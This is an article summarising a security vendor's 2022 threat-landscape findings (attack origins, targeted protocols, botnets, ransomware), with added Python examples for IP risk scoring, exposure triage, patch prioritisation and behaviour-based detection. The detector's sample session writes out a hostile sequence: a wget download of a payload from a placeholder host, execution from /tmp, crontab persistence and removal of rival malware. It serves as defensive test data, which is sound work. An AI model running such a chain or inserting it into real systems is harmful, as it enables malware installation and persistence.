Rapid digitization means that organizations are now more connected than ever. Most organizations now host a combination of interconnected IT, OT, IoT and sometimes IoMT devices in their networks, which has increased their attack surface. Forescout’s data shows that around 24% of connected devices in every organization are no longer traditional IT.
What are the key highlights of Forescout’s data?
The growing number and diversity of connected devices in every industry presents a set of new challenges for organizations and companies in understanding and managing their general risk exposure. In brief, we have entered a new era of mixed IT/IoT threats, with cyberattacks and cybercrime around the world growing in intensity, sophistication, and frequency as well.
The adoption of new connected devices in 2023 is likely to pose even greater challenges for cybersecurity professionals across the globe. To help organizations and companies of all sizes prepare, Forescout’s Vedere Labs has analyzed information and data gathered in 2022 about cyberattacks, crime, exploits and malware and shared insights in our 2022 Threat Roundup.
Excerpted below are findings and insights for defenders, a brief outlook based on observations, and strategic recommendations on how to protect your environment from the evolving threat landscape. For a detailed analysis of the attacks, exploits and malware observed in 2022, including a technical deep dive into endemic and emerging malware threats.
What are the key findings and insights for defenders?
Here are the takeaways and corresponding actions your organisation can take to help prevent and mitigate the types of cyberattacks we observed in 2022, along with a few cyber hygiene best practices.
The top 10 countries account for 73% of malicious traffic
In these countries, attackers rely on legitimate hosting providers (81% of attacks), but also leverage bulletproof hosting and compromised hosts on consumer and business networks.
Some countries of origin carry notoriously risky traffic, for example Russia and China. If your organization does not do business with, or in, a particular country, then blocking those IP ranges can help reduce noise. However, judging IP addresses solely by country of origin may be ineffective, since many attacks originate from American, European and Asian countries that would hardly look suspicious on a corporate network.
Autonomous systems (ASs) are a better sign of risk than the country of origin, since they are far more specific. IPs belonging to known bulletproof hosting (BPH) providers and to organizations that do not promptly respond to abuse complaints should be treated with care.
On the other hand, your own network may be the victim of abuse right now, with malicious actors using it to launch further attacks. Pay attention to outbound communications that seem suspicious, even when they target known benign addresses. Subscribing to threat feeds can also help you detect compromises in your own network.
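To show why the article prefers ASN-level judgement over country-level blocking, here is an added example (not Forescout's code or data): a longest-prefix lookup against a constructed prefix-to-ASN table, with placeholder ASNs, prefixes and country codes, comparing a country blocklist with a risky-ASN list for the same source IP.

```python
import ipaddress

# Constructed prefix-to-ASN table standing in for a real routing/WHOIS dataset.
# The ASNs, prefixes and country codes below are placeholders, not real operators.
PREFIX_TABLE = {
    "203.0.113.0/24": ("AS64500", "US"),   # hypothetical bulletproof hosting provider
    "203.0.112.0/22": ("AS64501", "US"),   # hypothetical mainstream hosting provider
    "198.51.100.0/24": ("AS64502", "DE"),  # hypothetical consumer ISP
    "192.0.2.0/24": ("AS64503", "RU"),     # hypothetical cloud provider
}
# ASNs that ignore abuse complaints or are known BPH, as the article recommends tracking.
RISKY_ASNS = {"AS64500"}

# Most-specific prefixes first, so the first containing network wins (longest-prefix match).
NETWORKS = sorted(
    ((ipaddress.ip_network(p), asn, cc) for p, (asn, cc) in PREFIX_TABLE.items()),
    key=lambda t: t[0].prefixlen, reverse=True,
)

def lookup(ip):
    """Return (asn, country) for an IP via longest-prefix match, or (None, None)."""
    addr = ipaddress.ip_address(ip)
    for net, asn, cc in NETWORKS:
        if addr in net:
            return asn, cc
    return None, None

def assess(ip, country_blocklist=frozenset({"RU", "CN"})):
    """Compare a country-only policy with an ASN-aware one for a single source IP."""
    asn, cc = lookup(ip)
    return {
        "ip": ip, "asn": asn, "country": cc,
        "blocked_by_country": cc in country_blocklist,
        "flagged_by_asn": asn in RISKY_ASNS,
    }

if __name__ == "__main__":
    for ip in ("203.0.113.5", "203.0.112.9", "192.0.2.1"):
        print(assess(ip))
```

The US-based BPH prefix passes a country filter but is caught by the ASN list, while the benign US provider sharing the covering /22 is left alone.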
Remote management protocols are the top target for initial access
Remote management protocols account for 43% of initial-access attempts, followed by web attacks (26%) and attacks on remote storage protocols (23%). (These statistics do not account for phishing, which is a very popular method, arguably the most popular for initial access, but is not captured by our honeypots.)
Some services are naturally more complex to defend because they must by nature be exposed on the internet, such as web and email servers. However, unnecessary services often end up being exposed, too – and they may be easy targets for exploitation. To minimize exposure:
- Inventory every device that has an exposed management protocol or database service.
- Disable those that are not required and focus on hardening the ones that still need to be exposed, for example by requiring VPN connections where appropriate.
Adopting appropriate and effective security solutions such as web application firewalls (WAFs) and host or network intrusion prevention systems (IPSs), as well as sound architectural choices such as DMZs and network segmentation, also helps reduce risk significantly.
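The inventory-then-disable-or-harden procedure above, as an added example rather than Forescout's own tooling: it triages a constructed inventory export (asset, open ports, internet exposure, whether the owner says the service is required) against an assumed port-to-service-class map covering the management, remote storage, database and OT families the article names.

```python
import csv
import io

# Assumed port-to-service-class map for the protocol families the article discusses.
MANAGEMENT = {22: "SSH", 23: "Telnet", 3389: "RDP", 5900: "VNC", 161: "SNMP"}
REMOTE_STORAGE = {445: "SMB", 2049: "NFS", 21: "FTP"}
DATABASES = {3306: "MySQL", 5432: "PostgreSQL", 1433: "MSSQL", 27017: "MongoDB", 6379: "Redis"}
OT = {502: "Modbus/TCP", 47808: "BACnet"}

# Constructed inventory export (hypothetical asset names and exposures).
INVENTORY_CSV = """asset,ports,internet_facing,required
nas-01,445;22,yes,no
web-01,80;443;22,yes,yes
db-01,5432,yes,no
plc-07,502;23,no,yes
cam-12,23;554,yes,no
"""

def classify(port):
    """Map a port to (service family, name); None for ports outside the tracked families."""
    for family, table in (("management", MANAGEMENT), ("remote_storage", REMOTE_STORAGE),
                          ("database", DATABASES), ("ot", OT)):
        if port in table:
            return family, table[port]
    return None, None

def triage(inventory_csv):
    """Return findings ordered by severity, following the inventory / disable / harden steps."""
    findings = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        exposed = row["internet_facing"] == "yes"
        required = row["required"] == "yes"
        for port in (int(p) for p in row["ports"].split(";") if p):
            family, name = classify(port)
            if family is None:
                continue  # e.g. HTTP/RTSP: not a management, storage, database or OT service
            if family in ("database", "ot") and exposed:
                action, sev = "remove from internet immediately", 3
            elif not required:
                action, sev = "disable service", 2 if exposed else 1
            elif exposed:
                action, sev = "require VPN / restrict source addresses", 2
            else:
                action, sev = "keep; monitor", 0
            findings.append({"asset": row["asset"], "service": name, "family": family,
                             "exposed": exposed, "severity": sev, "action": action})
    return sorted(findings, key=lambda f: -f["severity"])
```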
Many attacks on these protocols rely on weak or default credentials
Popular and generic usernames (such as “root” and “admin”) account for 87% of attempts, but the other 13% include dozens of highly specific usernames for particular applications and devices.
Accounts for specific services are being scanned all the time, so change default usernames and passwords wherever possible. Use complex, unique passwords for every service on every device. Rotate credentials at regular intervals so that leaked credentials do not remain valid. Finally, enable two-factor authentication for apps.
Exploits are not limited to traditional applications
Three-quarters (which is about 76%) of exploits target online software libraries like Log4j, OpenSSH and TCP/IP stacks. Other popular targets include exposed services, such as databases, web applications/servers and email servers, as well as internet-facing network infrastructure, such as firewalls and routers. It is important to note that the vulnerabilities used by opportunistic attackers are also employed by a few sophisticated state-sponsored actors.
When deciding which vulnerabilities to patch and when, focus not only on CVSS and other severity metrics, but also consider the vulnerabilities that are actually being exploited by these cybercriminals. CISA keeps an up-to-date catalogue of known exploited vulnerabilities, which is a valuable resource for organizations and companies of all sizes to keep alert and aware.
Out of all these vulnerabilities, the ones affecting software components are the most difficult to eradicate because of their devious tendency to trickle down the supply chain. This is especially true for open-source components. When a vulnerability cannot be patched or fixed on all devices in the entire network, a risk assessment and mitigation plan including segmentation as well as close network monitoring is the best approach for most organizations.
Besides focusing on the most exploited vulnerabilities for patching and fixing, it is important to know the vulnerabilities that are being exploited at a certain point in time to enable focused threat hunting exercises on a network, looking for any signs of what is popular at that time.
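As an added example of the patch-prioritisation advice above (not Forescout's code), the script below ranks constructed scanner findings by known-exploited status first and CVSS second. The KEV excerpt is constructed in the shape of CISA's JSON feed, and the CVE identifiers are placeholders, not real entries.

```python
import json

# Constructed excerpt in the shape of the CISA KEV JSON feed; the cveID values are placeholders.
KEV_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-0000-0001", "dateAdded": "2022-03-01", "dueDate": "2022-03-22",
     "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-0000-0002", "dateAdded": "2022-11-10", "dueDate": "2022-12-01",
     "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed vulnerability-scanner output (hypothetical assets and scores).
FINDINGS = [
    {"asset": "fw-edge-01", "cve": "CVE-0000-0002", "cvss": 7.5, "internet_facing": True},
    {"asset": "build-srv-03", "cve": "CVE-0000-0001", "cvss": 9.8, "internet_facing": False},
    {"asset": "hr-app-02", "cve": "CVE-0000-0003", "cvss": 9.9, "internet_facing": False},
    {"asset": "hmi-panel-04", "cve": "CVE-0000-0003", "cvss": 9.9, "internet_facing": True},
]

def load_kev(raw):
    """Index the catalog by CVE id for O(1) membership checks."""
    return {v["cveID"]: v for v in json.loads(raw)["vulnerabilities"]}

def priority(finding, kev):
    """Known exploitation outranks any CVSS score; ransomware use and exposure add weight."""
    score = 0.0
    entry = kev.get(finding["cve"])
    if entry:
        score += 100
        if entry.get("knownRansomwareCampaignUse") == "Known":
            score += 20
    if finding["internet_facing"]:
        score += 10
    return score + finding["cvss"]

def prioritize(findings, kev):
    """Highest-priority finding first."""
    return sorted(findings, key=lambda f: priority(f, kev), reverse=True)

if __name__ == "__main__":
    for f in prioritize(FINDINGS, load_kev(KEV_JSON)):
        print(f"{priority(f, load_kev(KEV_JSON)):6.1f}  {f['asset']:14} {f['cve']}")
```

Note that the CVSS 9.9 findings land last: nothing in the catalog says they are being exploited, so the internet-facing CVSS 7.5 entry on the firewall is handled before them.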
Critical infrastructure is a constant target
We have observed exploits for specific devices but also constant enumeration of popular OT protocols, including those used in industrial automation, building automation and utilities.
Monitoring the traffic to and from OT devices is nowadays as critical as monitoring IT traffic. Attackers are constantly probing these devices for weaknesses and many organizations and companies will be blind to that because they believe that they don’t have OT assets to protect. The truth is that building automation and even protocols such as Modbus for industrial automation are now found in almost every organization and are a target for attackers.
95% of post-exploitation activities related to discovery of further data
Persistence and the execution of further commands are also very common, including the removal of artifacts belonging to rival malware already present on the host.
Even after an initial breach, threat actors and criminals need to spend time getting situated in the target system, downloading further tools, executing them and persisting. Many of these actions provide more chances for detection and response, provided that proper endpoint introspection capabilities are available, which is a notorious problem on non-IT endpoints.
The most common malware observed
The most common malware observed was ransomware (53%), botnets (25%) and cryptominers (7%). Large active botnet campaigns, such as Dota3, represent almost 90% of the IPs we observe dropping malware. Some malware remains endemic (such as WannaCry and Mirai variants). Emerging botnets (such as Chaos) are starting to cross the boundaries between IoT and IT.
Malware hashes are insufficient as IoCs because some malware is polymorphic, meaning its hash differs for each new victim. It is therefore better to also detect and hunt for TTPs and anomalous behaviour rather than relying solely on IoCs.
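To make the TTP-over-hash point concrete, and to illustrate the post-exploitation sequence (discovery, downloading tools, execution, persistence, rival removal) described earlier, here is an added detector that is not Forescout's code. It tags commands from a constructed shell session with hypothetical paths and hostnames, and alerts on the download, execute, persist chain regardless of what the dropped file hashes to.

```python
import re

# Constructed shell session from a compromised Linux host (hypothetical commands and paths).
SESSION = """uname -a
cat /proc/cpuinfo
ip addr
wget -q http://dropper.example.invalid/payload -O /tmp/.x
chmod +x /tmp/.x
/tmp/.x
(crontab -l; echo "@reboot /tmp/.x") | crontab -
pkill -9 -f rivalbot
rm -rf /tmp/rivalbot /var/tmp/rivalbot
"""

# Behaviour patterns mapped to the post-exploitation stages the article describes.
TACTICS = [
    ("discovery",     re.compile(r"^(uname|id\b|whoami|cat /proc/|ip addr|ifconfig|netstat|ps )")),
    ("download",      re.compile(r"^(wget|curl|tftp|ftp)\b")),
    ("execution",     re.compile(r"^(chmod \+x|/tmp/|/var/tmp/|/dev/shm/|sh |bash )")),
    ("persistence",   re.compile(r"(crontab|/etc/rc\.local|\.bashrc|systemctl enable)")),
    ("rival_removal", re.compile(r"^(pkill|killall|kill )|^rm -rf /(tmp|var/tmp|dev/shm)")),
]

def tag_commands(session):
    """Label every command line with the tactics it matches (a line may match several)."""
    tagged = []
    for line in session.splitlines():
        line = line.strip()
        if line:
            tagged.append((line, [name for name, rx in TACTICS if rx.search(line)]))
    return tagged

def detect(session):
    """Alert on an ordered download -> execution -> persistence chain; file hashes play no part."""
    first_seen = {}
    for idx, (_, hits) in enumerate(tag_commands(session)):
        for name in hits:
            first_seen.setdefault(name, idx)
    chain = all(t in first_seen for t in ("download", "execution", "persistence"))
    ordered = chain and first_seen["download"] < first_seen["execution"] < first_seen["persistence"]
    return {
        "tactics": sorted(first_seen),
        "alert": ordered,
        # the article's 95% figure: discovery typically precedes everything else
        "discovery_first": first_seen.get("discovery", 99) < first_seen.get("download", 99),
    }
```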
What are the Vedere Labs findings on IT and IoT?
In 2022 Vedere Labs observed many open-source botnets; that is, botnets that use malware whose source code is available on GitHub or has been leaked and widely publicised. Such code can be quickly customised by inexperienced malware developers for their own purposes.
Relying on shared or leaked code, IoT botnets have gradually evolved from brute-forcing Telnet credentials to exploiting a large number of CVEs, with the advantage that exploits last longer and that persistent malware is harder to remove on IoT devices than on IT devices.
The Chaos botnet is one of the latest developments in this long line of botnet evolution, but it definitely won’t be the last one. With its lateral movement and exploitation capabilities, Chaos could easily be used to drop ransomware or other malware instead of cryptominers and DDoS.
Cybercriminals are after money. In 2022, Forescout’s Vedere Labs developed R4IoT, a proof-of-concept that showed how IoT devices act as entry points for IT and OT ransomware attacks.
At the time, we assumed that the initial IoT attack – an exploit on an IP camera or NAS – would be carried out manually either by a ransomware group or by relying on an intermediary such as an IAB. After reviewing the 2022 data and information, we realize that a new wave of botnets has opened the doors to such an attack being carried out as part of an automated campaign.
What are the recommended three pillars of cybersecurity?
As the threat landscape continues to evolve and more organizations adopt cybersecurity not only for endpoints but also for the growing number of unsecured IoT devices, threat actors have consistently moved to devices that offer much easier entry points. In order to protect your environment, we recommend that organizations focus on three key pillars of cybersecurity:
- Risk and exposure management. Start by identifying every asset connected to the network and its security posture, including known vulnerabilities, credentials and open ports. Forescout also recommends mapping your environment to a security framework such as CIS. Then, change the default “easily guessable” credentials and use strong, unique passwords for each device.
Next, disable unused services and patch all vulnerabilities to prevent exploitation. With your attack surface understood, you can now fully assess risk in your environment. Finally, focus on mitigation using a risk-based approach. Use automated controls that do not rely only on security agents and that apply to the whole enterprise instead of silos like the IT network, the OT network, or specific types of IoT devices.
- Network security. Do not expose unmanaged devices directly on the internet, with very few exceptions such as routers and firewalls. Segment the network to isolate IT, IoT and OT devices, limiting network connections to only specifically allowed management and engineering workstations or among unmanaged devices that need to communicate.
This kind of segmentation shouldn’t happen only between IT and OT, but also within IT and OT networks to prevent lateral movement and data exfiltration. Restrict external communication paths, and isolate or contain vulnerable devices in zones as a mitigating control if they cannot be patched, or until they can be.
- Threat detection and response. Use an IoT/OT-aware, DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions such as vulnerability exploitation, password guessing and unauthorized use of OT protocols. Anomalous and malformed traffic should be blocked, or its presence should at least be reported to network operators.
Extended detection and response (XDR) solutions are an important consideration. They collect telemetry and logs from various sources (security tools, applications, infrastructure, cloud and other enrichment sources); correlate attack signals to generate high-fidelity detections for analyst investigation; and enable automated response actions across the enterprise.